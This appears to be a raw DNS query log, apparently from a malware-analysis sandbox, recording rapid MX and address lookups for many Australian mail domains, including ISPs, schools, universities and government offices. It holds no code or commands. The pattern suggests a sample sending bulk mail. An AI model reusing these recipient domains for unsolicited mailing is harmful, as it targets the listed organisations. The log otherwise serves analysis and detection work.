                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.071434975 CET8.8.8.8192.168.2.30x6bc2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.120927095 CET8.8.8.8192.168.2.30x4e68No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.151365042 CET8.8.8.8192.168.2.30xc608Name error (3)academyroofing.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.261128902 CET8.8.8.8192.168.2.30x1888No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.261128902 CET8.8.8.8192.168.2.30x1888No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.261128902 CET8.8.8.8192.168.2.30x1888No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.284080029 CET8.8.8.8192.168.2.30x1849No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.347182989 CET8.8.8.8192.168.2.30x434eNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.347182989 CET8.8.8.8192.168.2.30x434eNo error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.370294094 CET8.8.8.8192.168.2.30x8bf3No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.436000109 CET8.8.8.8192.168.2.30xf0a6No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.438545942 CET8.8.8.8192.168.2.30x66d9No error (0)marketlinkaustralia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.461329937 CET8.8.8.8192.168.2.30xbb79No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.461329937 CET8.8.8.8192.168.2.30xbb79No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.465054035 CET8.8.8.8192.168.2.30x5e44No error (0)hosted-inbound.iinet.net.au203.10.1.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.816108942 CET8.8.8.8192.168.2.30xe2b0No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.816108942 CET8.8.8.8192.168.2.30xe2b0No error (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.848711967 CET8.8.8.8192.168.2.30x711eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.848711967 CET8.8.8.8192.168.2.30x711eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.848711967 CET8.8.8.8192.168.2.30x711eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.859886885 CET8.8.8.8192.168.2.30x5cd3No error (0)asav2.iinet.net.au27.32.32.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.874021053 CET8.8.8.8192.168.2.30xf22bNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.894191980 CET8.8.8.8192.168.2.30xd568No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.920202971 CET8.8.8.8192.168.2.30xe83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.920202971 CET8.8.8.8192.168.2.30xe83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.920202971 CET8.8.8.8192.168.2.30xe83cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.945717096 CET8.8.8.8192.168.2.30xc5ccNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.115657091 CET8.8.8.8192.168.2.30xbfbaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.115657091 CET8.8.8.8192.168.2.30xbfbaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.115657091 CET8.8.8.8192.168.2.30xbfbaNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.144408941 CET8.8.8.8192.168.2.30x72c5No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.175760984 CET8.8.8.8192.168.2.30x4f93No error (0)ivanhoegirls.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.175760984 CET8.8.8.8192.168.2.30x4f93No error (0)ivanhoegirls.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.245641947 CET8.8.8.8192.168.2.30x2b1bNo error (0)ivanhoegirls-vic-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.245641947 CET8.8.8.8192.168.2.30x2b1bNo error (0)ivanhoegirls-vic-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.315901041 CET8.8.8.8192.168.2.30xc1d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.315901041 CET8.8.8.8192.168.2.30xc1d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.315901041 CET8.8.8.8192.168.2.30xc1d7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.345838070 CET8.8.8.8192.168.2.30x70dcNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.571260929 CET8.8.8.8192.168.2.30xe94bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.571260929 CET8.8.8.8192.168.2.30xe94bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.571260929 CET8.8.8.8192.168.2.30xe94bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.576200962 CET8.8.8.8192.168.2.30xec74No error (0)msn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.594304085 CET8.8.8.8192.168.2.30xcf96No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.708992958 CET8.8.8.8192.168.2.30x76aeNo error (0)oft.commerce.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.708992958 CET8.8.8.8192.168.2.30x76aeNo error (0)oft.commerce.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.708992958 CET8.8.8.8192.168.2.30x76aeNo error (0)oft.commerce.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.739418983 CET8.8.8.8192.168.2.30x6a1fNo error (0)senet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.754081964 CET8.8.8.8192.168.2.30x6f28No error (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.763489962 CET8.8.8.8192.168.2.30xb02eNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.774791002 CET8.8.8.8192.168.2.30xe5c3No error (0)extmail.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.774791002 CET8.8.8.8192.168.2.30xe5c3No error (0)extmail.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.781100035 CET8.8.8.8192.168.2.30xd152No error (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.781100035 CET8.8.8.8192.168.2.30xd152No error (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.796957016 CET8.8.8.8192.168.2.30x9624No error (0)docparmail01.fairtrading.nsw.gov.au61.88.105.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.798091888 CET8.8.8.8192.168.2.30x3c52No error (0)ichr.uwa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.798091888 CET8.8.8.8192.168.2.30x3c52No error (0)ichr.uwa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.798091888 CET8.8.8.8192.168.2.30x3c52No error (0)ichr.uwa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.868375063 CET8.8.8.8192.168.2.30x9cc2No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.879868031 CET8.8.8.8192.168.2.30x2ce5No error (0)telethonkids.in.tmes-anz.trendmicro.com13.238.202.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.879868031 CET8.8.8.8192.168.2.30x2ce5No error (0)telethonkids.in.tmes-anz.trendmicro.com13.238.202.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.879868031 CET8.8.8.8192.168.2.30x2ce5No error (0)telethonkids.in.tmes-anz.trendmicro.com13.238.202.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.883368015 CET8.8.8.8192.168.2.30x8429No error (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.914928913 CET8.8.8.8192.168.2.30x35b9No error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:26.914928913 CET8.8.8.8192.168.2.30x35b9No error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.014128923 CET8.8.8.8192.168.2.30xf812No error (0)slmcorporate.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.014128923 CET8.8.8.8192.168.2.30xf812No error (0)slmcorporate.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.014128923 CET8.8.8.8192.168.2.30xf812No error (0)slmcorporate.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.014128923 CET8.8.8.8192.168.2.30xf812No error (0)slmcorporate.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.116746902 CET8.8.8.8192.168.2.30xc463No error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.116746902 CET8.8.8.8192.168.2.30xc463No error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.116746902 CET8.8.8.8192.168.2.30xc463No error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.116746902 CET8.8.8.8192.168.2.30xc463No error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.116746902 CET8.8.8.8192.168.2.30xc463No error (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.145813942 CET8.8.8.8192.168.2.30x234No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.145813942 CET8.8.8.8192.168.2.30x234No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.145813942 CET8.8.8.8192.168.2.30x234No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.156270027 CET8.8.8.8192.168.2.30x1d09No error (0)alt2.aspmx.l.google.com74.125.200.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.161130905 CET8.8.8.8192.168.2.30xfa62No error (0)extmail.msn.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.161130905 CET8.8.8.8192.168.2.30xfa62No error (0)extmail.msn.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.203321934 CET8.8.8.8192.168.2.30x51e3No error (0)slmcorporate-com-au.p10.spamhero.com209.41.68.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.203321934 CET8.8.8.8192.168.2.30x51e3No error (0)slmcorporate-com-au.p10.spamhero.com216.172.106.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.272782087 CET8.8.8.8192.168.2.30xd95aNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.366636038 CET8.8.8.8192.168.2.30x7d03No error (0)ab.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.411128998 CET8.8.8.8192.168.2.30x513fNo error (0)keypoint.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.411128998 CET8.8.8.8192.168.2.30x513fNo error (0)keypoint.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.411128998 CET8.8.8.8192.168.2.30x513fNo error (0)keypoint.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.456396103 CET8.8.8.8192.168.2.30x8b94No error (0)mx1.eftel.com203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.456396103 CET8.8.8.8192.168.2.30x8b94No error (0)mx1.eftel.com203.134.153.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.456420898 CET8.8.8.8192.168.2.30x47adNo error (0)mx01.auone-net.jp27.86.106.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.564033985 CET8.8.8.8192.168.2.30x4d47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.564033985 CET8.8.8.8192.168.2.30x4d47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.564033985 CET8.8.8.8192.168.2.30x4d47No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:27.564070940 CET8.8.8.8192.168.2.30xc348No error (0)chubb.com.auMX (Mail exchange)IN (0x0001)false
